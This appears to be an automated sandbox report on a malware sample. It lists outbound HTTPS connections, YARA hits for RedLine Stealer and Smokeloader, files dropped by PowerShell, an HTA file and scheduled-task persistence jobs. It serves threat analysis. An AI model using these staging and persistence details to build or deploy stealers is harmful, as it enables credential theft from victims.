Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443

Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.8:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.8:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.8:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.8:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.8:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.8:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.8:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.8:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.202.5.153:443 -> 192.168.2.8:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:49888 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:49891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:49895 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:49900 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49903 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49906 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49957 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.129.91:443 -> 192.168.2.8:50001 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50004 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50005 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:50007 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0000000D.00000002.2735545518.0000000000D69000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000D.00000002.2954337786.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Binary is likely a compiled AutoIt script file

Source: a103019032.exe, 0000001B.00000002.2558207070.0000000000EF2000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.		memstr_1541421c-1
Source: a103019032.exe, 0000001B.00000002.2558207070.0000000000EF2000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer		memstr_77936f15-c

Creates HTA files

Source: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe

File created: C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta

PE file contains section with special chars

Source: 0xqfQZufeQ.exe	Static PE information: section name:
Source: 0xqfQZufeQ.exe	Static PE information: section name: .idata
Source: 0xqfQZufeQ.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name:
Source: 0f39a8c7db.exe.6.dr	Static PE information: section name:
Source: 0f39a8c7db.exe.6.dr	Static PE information: section name: .idata
Source: 0f39a8c7db.exe.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: 8166ff9922.exe.6.dr	Static PE information: section name:
Source: 8166ff9922.exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe1.6.dr	Static PE information: section name:
Source: random[1].exe1.6.dr	Static PE information: section name: .idata
Source: random[1].exe1.6.dr	Static PE information: section name:
Source: 3f28c42ac4.exe.6.dr	Static PE information: section name:
Source: 3f28c42ac4.exe.6.dr	Static PE information: section name: .idata
Source: 3f28c42ac4.exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: .idata
Source: 382cd038a3.exe.6.dr	Static PE information: section name:
Source: 382cd038a3.exe.6.dr	Static PE information: section name: .idata
Source: skotes.exe.9.dr	Static PE information: section name:
Source: skotes.exe.9.dr	Static PE information: section name: .idata
Source: random[3].exe.14.dr	Static PE information: section name:
Source: random[3].exe.14.dr	Static PE information: section name: .idata
Source: random[3].exe.14.dr	Static PE information: section name:
Source: eb74aeb58b.exe.14.dr	Static PE information: section name:
Source: eb74aeb58b.exe.14.dr	Static PE information: section name: .idata
Source: eb74aeb58b.exe.14.dr	Static PE information: section name:
Source: random[1].exe.14.dr	Static PE information: section name:
Source: random[1].exe.14.dr	Static PE information: section name: .idata
Source: random[1].exe.14.dr	Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\TempGZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4AB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	8_2_6C4AB700
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4AB8C0 rand_s,NtQueryVirtualMemory,	8_2_6C4AB8C0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4AB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	8_2_6C4AB910
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C44F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	8_2_6C44F280

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	File created: C:\Windows\Tasks\axplong.job			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	File created: C:\Windows\Tasks\skotes.job			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00D3E440	6_2_00D3E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00D34CF0	6_2_00D34CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00D73068	6_2_00D73068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00D67D83	6_2_00D67D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00D34AF0	6_2_00D34AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00D7765B	6_2_00D7765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00D72BD0	6_2_00D72BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00D7777B	6_2_00D7777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00D76F09	6_2_00D76F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00D78720	6_2_00D78720
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4435A0	8_2_6C4435A0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C455440	8_2_6C455440
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4B545C	8_2_6C4B545C
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4BAC00	8_2_6C4BAC00
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C485C10	8_2_6C485C10
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C492C10	8_2_6C492C10
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4B542B	8_2_6C4B542B
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4564C0	8_2_6C4564C0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C46D4D0	8_2_6C46D4D0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C44D4E0	8_2_6C44D4E0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C486CF0	8_2_6C486CF0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C456C80	8_2_6C456C80
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4A34A0	8_2_6C4A34A0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4AC4A0	8_2_6C4AC4A0
